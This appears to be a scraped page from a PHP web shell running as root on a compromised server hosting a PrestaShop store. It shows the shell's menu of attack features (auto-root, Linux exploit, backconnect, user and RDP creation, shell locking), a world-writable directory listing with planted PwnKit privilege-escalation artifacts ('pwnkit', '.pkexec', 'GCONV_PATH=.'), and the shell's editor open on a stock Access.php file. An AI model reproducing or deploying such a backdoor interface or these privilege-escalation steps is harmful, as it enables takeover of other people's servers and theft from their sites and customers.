Linux vmi284606.contaboserver.net 4.15.0-213-generic #224-Ubuntu SMP Mon Jun 19 13:30:12 UTC 2023 x86_64
Apache/2.4.57 (Ubuntu)
: 167.86.127.34 | : 216.73.217.51
Cant Read [ /etc/named.conf ]
7.2.24-0ubuntu0.18.04.17
root
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
var /
www /
html /
insepet /
tienda /
classes /
[ HOME SHELL ]
Name
Size
Permission
Action
.pkexec
[ DIR ]
drwxr-xr-x
GCONV_PATH=.
[ DIR ]
drwxr-xr-x
Smarty
[ DIR ]
drwxrwxrwx
assets
[ DIR ]
drwxrwxrwx
cache
[ DIR ]
drwxrwxrwx
checkout
[ DIR ]
drwxrwxrwx
container
[ DIR ]
drwxrwxrwx
controller
[ DIR ]
drwxrwxrwx
db
[ DIR ]
drwxrwxrwx
exception
[ DIR ]
drwxrwxrwx
form
[ DIR ]
drwxrwxrwx
helper
[ DIR ]
drwxrwxrwx
lang
[ DIR ]
drwxrwxrwx
log
[ DIR ]
drwxrwxrwx
module
[ DIR ]
drwxrwxrwx
order
[ DIR ]
drwxrwxrwx
pdf
[ DIR ]
drwxrwxrwx
proxy
[ DIR ]
drwxrwxrwx
range
[ DIR ]
drwxrwxrwx
shop
[ DIR ]
drwxrwxrwx
stock
[ DIR ]
drwxrwxrwx
tax
[ DIR ]
drwxrwxrwx
tree
[ DIR ]
drwxrwxrwx
webservice
[ DIR ]
drwxrwxrwx
.htaccess
170
B
-rwxrwxrwx
.mad-root
0
B
-rw-r--r--
Access.php
13.21
KB
-rwxrwxrwx
Address.php
20.25
KB
-rwxrwxrwx
AddressChecksumCore.php
1.64
KB
-rwxrwxrwx
AddressFormat.php
24.11
KB
-rwxrwxrwx
Alias.php
5
KB
-rwxrwxrwx
Attachment.php
7.92
KB
-rwxrwxrwx
Attribute.php
13.54
KB
-rwxrwxrwx
AttributeGroup.php
13.43
KB
-rwxrwxrwx
CMS.php
11.36
KB
-rwxrwxrwx
CMSCategory.php
24.06
KB
-rwxrwxrwx
CMSRole.php
1.75
KB
-rwxrwxrwx
CSV.php
3
KB
-rwxrwxrwx
Carrier.php
61.8
KB
-rwxrwxrwx
Cart.php
199.01
KB
-rwxrwxrwx
CartRule.php
82.69
KB
-rwxrwxrwx
Category.php
84.02
KB
-rwxrwxrwx
Chart.php
4.11
KB
-rwxrwxrwx
ChecksumInterface.php
1.08
KB
-rwxrwxrwx
Combination.php
14.46
KB
-rwxrwxrwx
Configuration.php
26.12
KB
-rwxrwxrwx
ConfigurationKPI.php
8.59
KB
-rwxrwxrwx
ConfigurationTest.php
11.69
KB
-rwxrwxrwx
Connection.php
10.39
KB
-rwxrwxrwx
ConnectionsSource.php
5.7
KB
-rwxrwxrwx
Contact.php
3.75
KB
-rwxrwxrwx
Context.php
13.6
KB
-rwxrwxrwx
Cookie.php
13.76
KB
-rwxrwxrwx
Country.php
16.21
KB
-rwxrwxrwx
Currency.php
24.62
KB
-rwxrwxrwx
Curve.php
2.37
KB
-rwxrwxrwx
Customer.php
46.45
KB
-rwxrwxrwx
CustomerAddress.php
1.21
KB
-rwxrwxrwx
CustomerMessage.php
5.84
KB
-rwxrwxrwx
CustomerThread.php
9.69
KB
-rwxrwxrwx
Customization.php
13.47
KB
-rwxrwxrwx
CustomizationField.php
2.75
KB
-rwxrwxrwx
DateRange.php
2.46
KB
-rwxrwxrwx
Delivery.php
3.26
KB
-rwxrwxrwx
Dispatcher.php
42.78
KB
-rwxrwxrwx
Employee.php
22.86
KB
-rwxrwxrwx
Feature.php
11.16
KB
-rwxrwxrwx
FeatureValue.php
8.02
KB
-rwxrwxrwx
FileUploader.php
3.55
KB
-rwxrwxrwx
Gender.php
2.67
KB
-rwxrwxrwx
Group.php
14.44
KB
-rwxrwxrwx
GroupReduction.php
9.67
KB
-rwxrwxrwx
Guest.php
7.96
KB
-rwxrwxrwx
Hook.php
34.31
KB
-rwxrwxrwx
Image.php
28.12
KB
-rwxrwxrwx
ImageManager.php
23.53
KB
-rwxrwxrwx
ImageType.php
6.96
KB
-rwxrwxrwx
Language.php
55.27
KB
-rwxrwxrwx
Link.php
56.18
KB
-rwxrwxrwx
LocalizationPack.php
24.68
KB
-rwxrwxrwx
Mail.php
30.65
KB
-rwxrwxrwx
Manufacturer.php
20.94
KB
-rwxrwxrwx
ManufacturerAddress.php
1.23
KB
-rwxrwxrwx
Media.php
34.58
KB
-rwxrwxrwx
Message.php
6.28
KB
-rwxrwxrwx
Meta.php
18
KB
-rwxrwxrwx
Notification.php
7.33
KB
-rwxrwxrwx
ObjectModel.php
74.13
KB
-rwxrwxrwx
Pack.php
22.77
KB
-rwxrwxrwx
Page.php
4.47
KB
-rwxrwxrwx
PaymentFree.php
1.2
KB
-rwxrwxrwx
PaymentModule.php
57.15
KB
-rwxrwxrwx
PhpEncryption.php
3.34
KB
-rwxrwxrwx
PhpEncryptionEngine.php
4.23
KB
-rwxrwxrwx
PhpEncryptionLegacyEngine.php
4.71
KB
-rwxrwxrwx
PrestaShopAutoload.php
12.56
KB
-rwxrwxrwx
PrestaShopBackup.php
12.06
KB
-rwxrwxrwx
PrestaShopCollection.php
20.81
KB
-rwxrwxrwx
PrestaShopLogger.php
6.51
KB
-rwxrwxrwx
Product.php
263.08
KB
-rwxrwxrwx
ProductAssembler.php
3.32
KB
-rwxrwxrwx
ProductDownload.php
9.78
KB
-rwxrwxrwx
ProductPresenterFactory.php
3.54
KB
-rwxrwxrwx
ProductSale.php
12.68
KB
-rwxrwxrwx
ProductSupplier.php
8.78
KB
-rwxrwxrwx
Profile.php
7.54
KB
-rwxrwxrwx
QqUploadedFileForm.php
4.97
KB
-rwxrwxrwx
QqUploadedFileXhr.php
5.61
KB
-rwxrwxrwx
QuickAccess.php
4.63
KB
-rwxrwxrwx
Referrer.php
17.29
KB
-rwxrwxrwx
RequestSql.php
20.06
KB
-rwxrwxrwx
Risk.php
2.33
KB
-rwxrwxrwx
Search.php
41.29
KB
-rwxrwxrwx
SearchEngine.php
2.76
KB
-rwxrwxrwx
SpecificPrice.php
30.68
KB
-rwxrwxrwx
SpecificPriceRule.php
13.75
KB
-rwxrwxrwx
State.php
7.39
KB
-rwxrwxrwx
Store.php
6.32
KB
-rwxrwxrwx
Supplier.php
17.76
KB
-rwxrwxrwx
SupplierAddress.php
1.22
KB
-rwxrwxrwx
Tab.php
20.54
KB
-rwxrwxrwx
Tag.php
11.72
KB
-rwxrwxrwx
Tools.php
143.12
KB
-rwxrwxrwx
Translate.php
13.76
KB
-rwxrwxrwx
TranslatedConfiguration.php
4.57
KB
-rwxrwxrwx
Upgrader.php
11.54
KB
-rwxrwxrwx
Uploader.php
11.44
KB
-rwxrwxrwx
Validate.php
33.53
KB
-rwxrwxrwx
ValidateConstraintTranslator.p...
2.85
KB
-rwxrwxrwx
WarehouseAddress.php
1.22
KB
-rwxrwxrwx
Windows.php
1.29
KB
-rwxrwxrwx
Zone.php
3.39
KB
-rwxrwxrwx
index.php
1.29
KB
-rwxrwxrwx
pwnkit
10.99
KB
-rwxr-xr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : Access.php
<?php /** * 2007-2019 PrestaShop and Contributors * * NOTICE OF LICENSE * * This source file is subject to the Open Software License (OSL 3.0) * that is bundled with this package in the file LICENSE.txt. * It is also available through the world-wide-web at this URL: * https://opensource.org/licenses/OSL-3.0 * If you did not receive a copy of the license and are unable to * obtain it through the world-wide-web, please send an email * to license@prestashop.com so we can send you a copy immediately. * * DISCLAIMER * * Do not edit or add to this file if you wish to upgrade PrestaShop to newer * versions in the future. If you wish to customize PrestaShop for your * needs please refer to https://www.prestashop.com for more information. * * @author PrestaShop SA <contact@prestashop.com> * @copyright 2007-2019 PrestaShop SA and Contributors * @license https://opensource.org/licenses/OSL-3.0 Open Software License (OSL 3.0) * International Registered Trademark & Property of PrestaShop SA */ /** * Class AccessCore. */ class AccessCore extends ObjectModel { /** @var int Profile id which address belongs to */ public $id_profile = null; /** @var int AuthorizationRole id which address belongs to */ public $id_authorization_role = null; /** * @see ObjectModel::$definition */ public static $definition = array( 'table' => 'access', 'primary' => 'id_profile', 'fields' => array( 'id_profile' => array('type' => self::TYPE_INT, 'validate' => 'isNullOrUnsignedId', 'copy_post' => false), 'id_authorization_role' => array('type' => self::TYPE_INT, 'validate' => 'isNullOrUnsignedId', 'copy_post' => false), ), ); /** * Is access granted to this Role? * * @param string $role Role name ("Superadministrator", "sales", "translator", etc.) * @param int $idProfile Profile ID * * @return bool Whether access is granted * * @throws Exception */ public static function isGranted($role, $idProfile) { foreach ((array) $role as $currentRole) { preg_match( '/ROLE_MOD_(?P<type>[A-Z]+)_(?P<name>[A-Z0-9_]+)_(?P<auth>[A-Z]+)/', $currentRole, $matches ); if (isset($matches['type']) && $matches['type'] == 'TAB') { $joinTable = _DB_PREFIX_ . 'access'; } elseif (isset($matches['type']) && $matches['type'] == 'MODULE') { $joinTable = _DB_PREFIX_ . 'module_access'; } else { throw new Exception('The slug ' . $currentRole . ' is invalid'); } $currentRole = Db::getInstance()->escape($currentRole); $isCurrentGranted = (bool) Db::getInstance()->getRow(' SELECT t.`id_authorization_role` FROM `' . _DB_PREFIX_ . 'authorization_role` t LEFT JOIN ' . $joinTable . ' j ON j.`id_authorization_role` = t.`id_authorization_role` WHERE `slug` = "' . $currentRole . '" AND j.`id_profile` = "' . (int) $idProfile . '" '); if (!$isCurrentGranted) { return false; } } return true; } /** * Get all roles for the Profile ID. * * @param int $idProfile Profile ID * * @return array Roles */ public static function getRoles($idProfile) { $idProfile = (int) $idProfile; $accesses = Db::getInstance()->executeS(' SELECT r.`slug` FROM `' . _DB_PREFIX_ . 'authorization_role` r INNER JOIN `' . _DB_PREFIX_ . 'access` a ON a.`id_authorization_role` = r.`id_authorization_role` WHERE a.`id_profile` = "' . $idProfile . '" '); $accessesFromModules = Db::getInstance()->executeS(' SELECT r.`slug` FROM `' . _DB_PREFIX_ . 'authorization_role` r INNER JOIN `' . _DB_PREFIX_ . 'module_access` ma ON ma.`id_authorization_role` = r.`id_authorization_role` WHERE ma.`id_profile` = "' . $idProfile . '" '); $roles = array_merge($accesses, $accessesFromModules); foreach ($roles as $key => $role) { $roles[$key] = $role['slug']; } return $roles; } /** * Find Tab ID by slug. * * @param string $authSlug Slug * * @return string Tab ID * @todo: Find out if we should return an int instead. (breaking change) */ public static function findIdTabByAuthSlug($authSlug) { preg_match( '/ROLE_MOD_[A-Z]+_(?P<classname>[A-Z]+)_(?P<auth>[A-Z]+)/', $authSlug, $matches ); $result = Db::getInstance()->getRow(' SELECT `id_tab` FROM `' . _DB_PREFIX_ . 'tab` WHERE UCASE(`class_name`) = "' . $matches['classname'] . '" '); return $result['id_tab']; } /** * Find slug by Tab ID. * * @param int $idTab Tab ID * * @return string Full module slug */ public static function findSlugByIdTab($idTab) { $result = Db::getInstance()->getRow(' SELECT `class_name` FROM `' . _DB_PREFIX_ . 'tab` WHERE `id_tab` = "' . (int) $idTab . '" '); return self::sluggifyTab($result); } /** * Find slug by Parent Tab ID. * * @param int $idParentTab Tab ID * * @return string Full module slug */ public static function findSlugByIdParentTab($idParentTab) { return Db::getInstance()->executeS(' SELECT `class_name` FROM `' . _DB_PREFIX_ . 'tab` WHERE `id_parent` = "' . (int) $idParentTab . '" '); } /** * Find slug by Module ID. * * @param int $idModule Module ID * * @return string Full module slug */ public static function findSlugByIdModule($idModule) { $result = Db::getInstance()->getRow(' SELECT `name` FROM `' . _DB_PREFIX_ . 'module` WHERE `id_module` = "' . (int) $idModule . '" '); return self::sluggifyModule($result); } /** * Sluggify tab. * * @param string $tab Tab class name * @param string $authorization 'CREATE'|'READ'|'UPDATE'|'DELETE' * * @return string Full slug for tab */ public static function sluggifyTab($tab, $authorization = '') { return sprintf('ROLE_MOD_TAB_%s_%s', strtoupper($tab['class_name']), $authorization); } /** * Sluggify module. * * @param string $module Module name * @param string $authorization 'CREATE'|'READ'|'UPDATE'|'DELETE' * * @return string Full slug for module */ public static function sluggifyModule($module, $authorization = '') { return sprintf('ROLE_MOD_MODULE_%s_%s', strtoupper($module['name']), $authorization); } /** * Get legacy authorization. * * @param string $legacyAuth Legacy authorization * * @return bool|string|array Authorization */ public static function getAuthorizationFromLegacy($legacyAuth) { $auth = array( 'add' => 'CREATE', 'view' => 'READ', 'edit' => 'UPDATE', 'configure' => 'UPDATE', 'delete' => 'DELETE', 'uninstall' => 'DELETE', 'duplicate' => array('CREATE', 'UPDATE'), 'all' => array('CREATE', 'READ', 'UPDATE', 'DELETE'), ); return isset($auth[$legacyAuth]) ? $auth[$legacyAuth] : false; } /** * Add access. * * @param int $idProfile Profile ID * @param int $idRole Role ID * * @return string Whether access has been successfully granted ("ok", "error") */ public function addAccess($idProfile, $idRole) { $sql = ' INSERT IGNORE INTO `' . _DB_PREFIX_ . 'access` (`id_profile`, `id_authorization_role`) VALUES (' . (int) $idProfile . ',' . (int) $idRole . ') '; return Db::getInstance()->execute($sql) ? 'ok' : 'error'; } /** * Remove access. * * @param int $idProfile Profile ID * @param int $idRole Role ID * * @return string Whether access has been successfully removed ("ok", "error") */ public function removeAccess($idProfile, $idRole) { $sql = ' DELETE FROM `' . _DB_PREFIX_ . 'access` WHERE `id_profile` = "' . (int) $idProfile . '" AND `id_authorization_role` = "' . (int) $idRole . '" '; return Db::getInstance()->execute($sql) ? 'ok' : 'error'; } /** * Add module access. * * @param int $idProfile Profile ID * @param int $idRole Role ID * * @return string Whether module access has been successfully granted ("ok", "error") */ public function addModuleAccess($idProfile, $idRole) { $sql = ' INSERT IGNORE INTO `' . _DB_PREFIX_ . 'module_access` (`id_profile`, `id_authorization_role`) VALUES (' . (int) $idProfile . ',' . (int) $idRole . ') '; return Db::getInstance()->execute($sql) ? 'ok' : 'error'; } /** * @param int $idProfile * @param int $idRole * * @return string 'ok'|'error' */ public function removeModuleAccess($idProfile, $idRole) { $sql = ' DELETE FROM `' . _DB_PREFIX_ . 'module_access` WHERE `id_profile` = "' . (int) $idProfile . '" AND `id_authorization_role` = "' . (int) $idRole . '" '; return Db::getInstance()->execute($sql) ? 'ok' : 'error'; } /** * Update legacy access. * * @param int $idProfile Profile ID * @param int $idTab Tab ID * @param string $lgcAuth Legacy authorization * @param int $enabled Whether access should be granted * @param int $addFromParent Child from parents * * @return string Whether legacy access has been successfully updated ("ok", "error") * * @throws Exception */ public function updateLgcAccess($idProfile, $idTab, $lgcAuth, $enabled, $addFromParent = 0) { $idProfile = (int) $idProfile; $idTab = (int) $idTab; if ($idTab == -1) { $slug = 'ROLE_MOD_TAB_%_'; } else { $slug = self::findSlugByIdTab($idTab); } $whereClauses = array(); foreach ((array) self::getAuthorizationFromLegacy($lgcAuth) as $auth) { $slugLike = Db::getInstance()->escape($slug . $auth); $whereClauses[] = ' `slug` LIKE "' . $slugLike . '"'; } if ($addFromParent == 1) { foreach (self::findSlugByIdParentTab($idTab) as $child) { $child = self::sluggifyTab($child); foreach ((array) self::getAuthorizationFromLegacy($lgcAuth) as $auth) { $slugLike = Db::getInstance()->escape($child . $auth); $whereClauses[] = ' `slug` LIKE "' . $slugLike . '"'; } } } $roles = Db::getInstance()->executeS(' SELECT `id_authorization_role` FROM `' . _DB_PREFIX_ . 'authorization_role` t WHERE ' . implode(' OR ', $whereClauses) . ' '); if (empty($roles)) { throw new \Exception('Cannot find role slug'); } $res = array(); foreach ($roles as $role) { if ($enabled) { $res[] = $this->addAccess($idProfile, $role['id_authorization_role']); } else { $res[] = $this->removeAccess($idProfile, $role['id_authorization_role']); } } return in_array('error', $res) ? 'error' : 'ok'; } /** * Update (legacy) Module access. * * @param int $idProfile Profile ID * @param int $idModule Module ID * @param string $lgcAuth Legacy authorization * @param int $enabled Whether module access should be granted * * @return string Whether module access has been succesfully changed ("ok", "error") */ public function updateLgcModuleAccess($idProfile, $idModule, $lgcAuth, $enabled) { $idProfile = (int) $idProfile; $idModule = (int) $idModule; if ($idModule == -1) { $slug = 'ROLE_MOD_MODULE_%_'; } else { $slug = self::findSlugByIdModule($idModule); } $whereClauses = array(); foreach ((array) self::getAuthorizationFromLegacy($lgcAuth) as $auth) { $slugLike = Db::getInstance()->escape($slug . $auth); $whereClauses[] = ' `slug` LIKE "' . $slugLike . '"'; } $roles = Db::getInstance()->executeS(' SELECT `id_authorization_role` FROM `' . _DB_PREFIX_ . 'authorization_role` t WHERE ' . implode(' OR ', $whereClauses) . ' '); $res = array(); foreach ($roles as $role) { if ($enabled) { $res[] = $this->addModuleAccess($idProfile, $role['id_authorization_role']); } else { $res[] = $this->removeModuleAccess($idProfile, $role['id_authorization_role']); } } return in_array('error', $res) ? 'error' : 'ok'; } }
Close
